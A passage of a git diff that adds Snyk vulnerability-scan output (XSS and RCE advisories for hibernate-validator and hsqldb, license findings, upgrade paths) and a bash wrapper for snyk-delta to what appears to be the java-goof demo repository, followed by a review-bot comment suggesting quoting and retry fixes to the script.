"https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee", + "title": "GitHub Commit" + }, + { + "url": "https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/", + "title": "Hibernator Security Release Blog" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:51:34.418099Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 6.5, + 
"modificationTime": "2024-03-11T09:54:00.455389Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:47.749976Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:34.418099Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:54:00.455389Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Cross-site Scripting (XSS). The `SafeHtml` validator annotation fails to properly sanitize payloads consisting of potentially malicious code in HTML comments and instructions.\n## Details\n\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\n\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. 
The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\n\nInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\n\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\n \nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \n\n### Types of attacks\nThere are a few methods by which XSS can be manipulated:\n\n|Type|Origin|Description|\n|--|--|--|\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. 
When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\n\n### Affected environments\nThe following environments are susceptible to an XSS attack:\n\n* Web servers\n* Application servers\n* Web application environments\n\n### How to prevent\nThis section describes the top best practices designed to specifically protect your code: \n\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. 
\n* Give users the option to disable client-side scripts.\n* Redirect invalid requests.\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.18.Final, 6.1.0.Final or higher.\n## References\n- [Apache Security Advisory](https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee)\n- [Hibernator Security Release Blog](https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219)\n", + "epssDetails": { + "percentile": "0.61710", + "probability": "0.00232", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-10219" + ], + "CWE": [ + "CWE-79" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2020-05-14T16:07:06.897969Z", + "functions_new": [ + { + "version": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ], + "functionId": { + "className": "org.hibernate.validator.internal.constraintvalidators.hv.SafeHtmlValidator", + "functionName": "getFragmentAsDocument" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-10-18T14:55:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + 
"mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2020-01-09T14:55:12Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.455389Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-validator", + "version": "4.3.1.Final", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGHSQLDB-3040860", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", + "credit": [ + "OSS Fuzz Team" + ], + "semver": { + "vulnerable": [ + "[,2.7.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.7.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hsqldb:hsqldb", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212%23c7", + "title": "Chromium Bugs" + }, + { + "url": "https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941", + "title": "GitHub Commit" + }, + { + "url": "http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html%23src_jrt_access_control", + "title": "Mitigation" + }, + { + "url": "https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java", + "title": "SVN Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "assigner": "Red Hat", + 
"severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:05:55.045961Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when using `java.sql.Statement` or `java.sql.PreparedStatement` to process untrusted input. By default, it is allowed to call any static method of any Java class in the classpath resulting in code execution.\n\n## Workaround\nUsers who are unable to upgrade to the fixed version can set the system property `hsqldb.method_class_names` to classes which are allowed to be called. 
For example, `System.setProperty(\"hsqldb.method_class_names\", \"abc\")` or Java argument `-Dhsqldb.method_class_names=\"abc\"` can be used.\n## Remediation\nUpgrade `org.hsqldb:hsqldb` to version 2.7.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7)\n- [GitHub Commit](https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941)\n- [Mitigation](http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control)\n- [SVN Commit](https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java)\n", + "epssDetails": { + "percentile": "0.85801", + "probability": "0.01274", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-41853" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-77xx-rxvh-q682" + ] + }, + "packageName": "org.hsqldb:hsqldb", + "proprietary": false, + "creationTime": "2022-10-07T07:26:42.276748Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-06T18:52:05Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hsqldb", + "artifactId": "hsqldb" + }, + "publicationTime": "2022-10-07T07:26:42.515068Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.414572Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hsqldb:hsqldb@2.3.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hsqldb:hsqldb", + "version": "2.3.2", + 
"severityWithCritical": "high" + }, + { + "id": "snyk:lic:maven:org.aspectj:aspectjweaver:EPL-1.0", + "type": "license", + "title": "EPL-1.0 license", + "semver": { + "vulnerable": [ + "[1.5.4,)" + ] + }, + "license": "EPL-1.0", + "language": "java", + "description": "EPL-1.0 license", + "packageName": "org.aspectj:aspectjweaver", + "creationTime": "2024-06-18T21:24:04.112Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T21:24:04.112Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.aspectj:aspectjweaver@1.8.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.aspectj:aspectjweaver", + "version": "1.8.2", + "severityWithCritical": "medium" + }, + { + "id": "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1", + "type": "license", + "title": "LGPL-2.1 license", + "semver": { + "vulnerable": [ + "[4.0.0.CR1,)" + ] + }, + "license": "LGPL-2.1", + "language": "java", + "description": "LGPL-2.1 license", + "packageName": "org.hibernate.common:hibernate-commons-annotations", + "creationTime": "2024-06-18T11:03:46.980Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T11:03:46.980Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "org.hibernate.common:hibernate-commons-annotations@4.0.5.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate.common:hibernate-commons-annotations", + "version": "4.0.5.Final", + "severityWithCritical": "medium" + }, + { + "id": 
"snyk:lic:maven:org.hibernate.javax.persistence:hibernate-jpa-2.1-api:EPL-1.0", + "type": "license", + "title": "EPL-1.0 license", + "semver": { + "vulnerable": [ + "[1.0.0.Final,)" + ] + }, + "license": "EPL-1.0", + "language": "java", + "description": "EPL-1.0 license", + "packageName": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", + "creationTime": "2024-06-18T12:03:42.953Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T12:03:42.953Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "org.hibernate.javax.persistence:hibernate-jpa-2.1-api@1.0.0.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", + "version": "1.0.0.Final", + "severityWithCritical": "medium" + }, + { + "id": "snyk:lic:maven:org.hibernate:hibernate-entitymanager:LGPL-2.0", + "type": "license", + "title": "LGPL-2.0 license", + "semver": { + "vulnerable": [ + "[3.5.0.Beta-1, 5.3.1.Final)" + ] + }, + "license": "LGPL-2.0", + "language": "java", + "description": "LGPL-2.0 license", + "packageName": "org.hibernate:hibernate-entitymanager", + "creationTime": "2024-06-18T11:52:01.913Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T11:52:01.913Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-entitymanager@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-entitymanager", + "version": "4.3.7.Final", + "severityWithCritical": "medium" + }, + { + 
"id": "snyk:lic:maven:org.jboss.logging:jboss-logging:LGPL-2.1", + "type": "license", + "title": "LGPL-2.1 license", + "semver": { + "vulnerable": [ + "[3.0.1.GA, 3.1.2.GA)" + ] + }, + "license": "LGPL-2.1", + "language": "java", + "description": "LGPL-2.1 license", + "packageName": "org.jboss.logging:jboss-logging", + "creationTime": "2024-06-18T02:47:02.411Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T02:47:02.411Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final", + "org.jboss.logging:jboss-logging@3.1.0.CR2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.jboss.logging:jboss-logging", + "version": "3.1.0.CR2", + "severityWithCritical": "medium" + } + ], + "upgrade": { + "org.apache.logging.log4j:log4j-core@2.7": { + "upgradeTo": "org.apache.logging.log4j:log4j-core@2.13.2", + "upgrades": [ + "org.apache.logging.log4j:log4j-core@2.7", + "org.apache.logging.log4j:log4j-core@2.7", + "org.apache.logging.log4j:log4j-core@2.7", + "org.apache.logging.log4j:log4j-core@2.7", + "org.apache.logging.log4j:log4j-core@2.7", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "vulns": [ + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-567761", + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720", + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014", + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-31409" + ] + }, + "org.apache.struts:struts2-core@2.3.20": { + "upgradeTo": "org.apache.struts:struts2-core@6.1.2", + "upgrades": [ + "commons-fileupload:commons-fileupload@1.3.1", + "commons-io:commons-io@2.2", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + 
"org.apache.struts:struts2-core@2.3.20", + "org.freemarker:freemarker@2.3.19", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "commons-fileupload:commons-fileupload@1.3.1", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "commons-fileupload:commons-fileupload@1.3.1", + "commons-fileupload:commons-fileupload@1.3.1", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "ognl:ognl@3.0.6", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "vulns": [ + "SNYK-JAVA-COMMONSFILEUPLOAD-3326457", + "SNYK-JAVA-COMMONSIO-1277109", + "SNYK-JAVA-ORGAPACHESTRUTS-6102825", + "SNYK-JAVA-ORGAPACHESTRUTS-6100744", + "SNYK-JAVA-ORGAPACHESTRUTS-5707101", + "SNYK-JAVA-ORGAPACHESTRUTS-2635340", + "SNYK-JAVA-ORGAPACHESTRUTS-1049003", + "SNYK-JAVA-ORGFREEMARKER-1076795", + "SNYK-JAVA-ORGAPACHESTRUTS-608097", + 
"SNYK-JAVA-ORGAPACHESTRUTS-608098", + "SNYK-JAVA-ORGAPACHESTRUTS-609765", + "SNYK-JAVA-COMMONSFILEUPLOAD-30401", + "SNYK-JAVA-ORGAPACHESTRUTS-32477", + "SNYK-JAVA-ORGAPACHESTRUTS-31495", + "SNYK-JAVA-ORGAPACHESTRUTS-31501", + "SNYK-JAVA-ORGAPACHESTRUTS-31502", + "SNYK-JAVA-ORGAPACHESTRUTS-31503", + "SNYK-JAVA-ORGAPACHESTRUTS-31500", + "SNYK-JAVA-ORGAPACHESTRUTS-30207", + "SNYK-JAVA-ORGAPACHESTRUTS-30778", + "SNYK-JAVA-COMMONSFILEUPLOAD-30082", + "SNYK-JAVA-COMMONSFILEUPLOAD-31540", + "SNYK-JAVA-ORGAPACHESTRUTS-30774", + "SNYK-JAVA-ORGAPACHESTRUTS-30775", + "SNYK-JAVA-ORGAPACHESTRUTS-30776", + "SNYK-JAVA-ORGAPACHESTRUTS-451610", + "SNYK-JAVA-ORGAPACHESTRUTS-460223", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30802", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30803", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30804", + "SNYK-JAVA-OGNL-30474", + "SNYK-JAVA-ORGAPACHESTRUTS-30773", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30799", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30800", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30801", + "SNYK-JAVA-ORGAPACHESTRUTS-30060", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30798", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-5811864", + "SNYK-JAVA-ORGAPACHESTRUTS-30770", + "SNYK-JAVA-ORGAPACHESTRUTS-30771", + "SNYK-JAVA-ORGAPACHESTRUTS-30772", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-451611", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-474418" + ] + }, + "org.springframework:spring-web@3.2.6.RELEASE": { + "upgradeTo": "org.springframework:spring-web@5.3.34", + "upgrades": [ + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE", + 
"org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "vulns": [ + "SNYK-JAVA-ORGSPRINGFRAMEWORK-6597980", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-1009832", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-30165", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-30164", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-30163", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-31331" + ] + }, + "org.zeroturnaround:zt-zip@1.12": { + "upgradeTo": "org.zeroturnaround:zt-zip@1.13", + "upgrades": [ + "org.zeroturnaround:zt-zip@1.12" + ], + "vulns": [ + "SNYK-JAVA-ORGZEROTURNAROUND-31681" + ] + } + }, + "patch": {}, + "ignore": {}, + "pin": {} + }, + "filesystemPolicy": false, + "filtered": { + "ignore": [], + "patch": [] + }, + "uniqueCount": 157, + "projectName": "io.github.snyk:todolist-web-struts", + "foundProjectCount": 7, + "displayTargetFile": "todolist-goof/todolist-web-struts/pom.xml", + "hasUnknownVersions": false, + "path": "/Users/austindoll/Documents/GitHub/java-goof" + } +] diff --git a/output.txt b/output.txt new file mode 100644 index 0000000000..41bda4bec4 --- /dev/null +++ b/output.txt 
@@ -0,0 +1,15 @@ + +Testing /Users/austindoll/Documents/GitHub/java-goof ... + + +✔ Test completed + +Organization: austin.doll +Test type: Static code analysis +Project path: /Users/austindoll/Documents/GitHub/java-goof + +Summary: + +✔ Awesome! No issues were found. + + diff --git a/output2.json b/output2.json new file mode 100644 index 0000000000..f64d7e0220 --- /dev/null +++ b/output2.json @@ -0,0 +1,12 @@ +[ + "CWE-918" +] +[ + "CWE-256" +] +[ + "CWE-918" +] +[ + "CWE-256" +] diff --git a/script.sh b/script.sh new file mode 100755 index 0000000000..3a6fa0ce7a --- /dev/null +++ b/script.sh 
@@ -0,0 +1,85 @@
+#!/bin/bash
+
+# Call this script as you would call snyk test | snyk-delta, minus the --all-projects and --json flags
+# This is an interim fix until snyk-delta supports all projects itself (or snyk supports a --new flag)
+# example: /bin/bash snyk_delta_all_projects.sh --severity=high --exclude=tests,resources -- -s config.yaml
+# runs snyk test --all-projects --json $*
+# requires jq to be installed
+
+set -euo pipefail
+
+exit_code=0
+snyk_test_json=''
+formatted_json=''
+args=("$*")
+
+run_snyk_delta () {
+ # add in any other arguments you would like to use
+ snyk-delta
+}
+
+run_snyk_test () {
+ echo "Running: snyk test --all-projects --json" $args
+ local snyk_exit_code=0
+ {
+
+ snyk_test_json=`snyk test --all-projects --json $args`
+
+ } || {
+ snyk_exit_code=$?
+ if [ $snyk_exit_code -eq 2 ]
+ then
+ echo 'snyk test command was not successful, retry with -d to see more information'
+ exit 2
+ fi
+ }
+
+
+}
+
+format_snyk_test_output() {
+ echo "Procesing snyk test --json output"
+ {
+ formatted_json=`echo $snyk_test_json | jq -r 'if type=="array" then .[] else . end | @base64'`
+ } || {
+ echo 'failed to process snyk-test result'
+ exit 2
+ }
+}
+
+
+#######
+# 1. run snyk test
+run_snyk_test
+
+# 2. format results to support single & multiple results returned
+format_snyk_test_output
+
+# 3. call snyk-delta for each result
+for test in `echo $formatted_json`; do
+ single_result="$(echo ${test} | base64 -d)" # use "base64 -d -i" on Windows, which will ignore any "gardage" characters echoing may add
+ project_name="$(echo ${single_result} | jq -r '.displayTargetFile')"
+ echo 'Processing: ' ${project_name}
+ if echo ${single_result} | run_snyk_delta
+ then
+ project_exit_code=$?
+ echo 'Finished processing'
+ else
+ project_exit_code=$?
+ if [ $project_exit_code -gt 1 ]
+ then
+ echo 'snyk-delta encountered an error, retrying.'
+ echo ${single_result} | run_snyk_delta + fi + echo 'Finished processing' + fi + + if [ $project_exit_code -gt $exit_code ] + then + exit_code=$project_exit_code + fi + echo "Project: ${project_name} | Exit code: ${project_exit_code}" +done + +echo "Overall exit code for snyk-delta-all-projects.sh: ${exit_code}" +exit $exit_code diff --git a/snyk.html b/snyk.html new file mode 100644 index 0000000000..c82edb3770 --- /dev/null +++ b/snyk.html @@ -0,0 +1,828 @@ + + + + + + + + + Snyk test report + + + + + + + + + +
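Review bot: The retry in the `-gt 1` branch (`echo ${single_result} | run_snyk_delta` at the top of the second collapsed line) runs outside any conditional, so under `set -euo pipefail` a second failure aborts the whole loop before the per-project and overall exit codes are printed, and when the retry succeeds `project_exit_code` still carries the first failure. The same hunk also expands scanner output unquoted: `args=("$*")` joins every argument into one word that `$args` then re-splits, and `echo $snyk_test_json` / `echo ${single_result}` subject the JSON to word splitting and pathname expansion before jq sees it — the semver ranges such as `[,2.7.1)` earlier in this patch are valid glob bracket expressions. Use `args=("$@")` with `"${args[@]}"`, pipe the JSON through `printf '%s' "$var"`, and wrap the retry in its own `if` so its status is recorded; the typo `Procesing` in `format_snyk_test_output` can be fixed at the same time.

```shell
args=("$@")

# … unchanged: run_snyk_delta …

run_snyk_test () {
  echo "Running: snyk test --all-projects --json" "${args[@]}"
  local snyk_exit_code=0
  {
    snyk_test_json=$(snyk test --all-projects --json "${args[@]}")
  } || {
    # … unchanged: exit-code handling …
  }
}

format_snyk_test_output() {
  echo "Processing snyk test --json output"
  {
    formatted_json=$(printf '%s' "$snyk_test_json" | jq -r 'if type=="array" then .[] else . end | @base64')
  } || {
    # … unchanged: error message and exit 2 …
  }
}

# … unchanged: steps 1 and 2 …
for test in $formatted_json; do
  single_result="$(printf '%s' "$test" | base64 -d)"
  project_name="$(printf '%s' "$single_result" | jq -r '.displayTargetFile')"
  echo 'Processing: ' "${project_name}"
  if printf '%s' "$single_result" | run_snyk_delta; then
    project_exit_code=0
  else
    project_exit_code=$?
    if [ "$project_exit_code" -gt 1 ]; then
      echo 'snyk-delta encountered an error, retrying.'
      # run the retry inside a conditional so set -e cannot abort the loop and its status is kept
      if printf '%s' "$single_result" | run_snyk_delta; then
        project_exit_code=0
      else
        project_exit_code=$?
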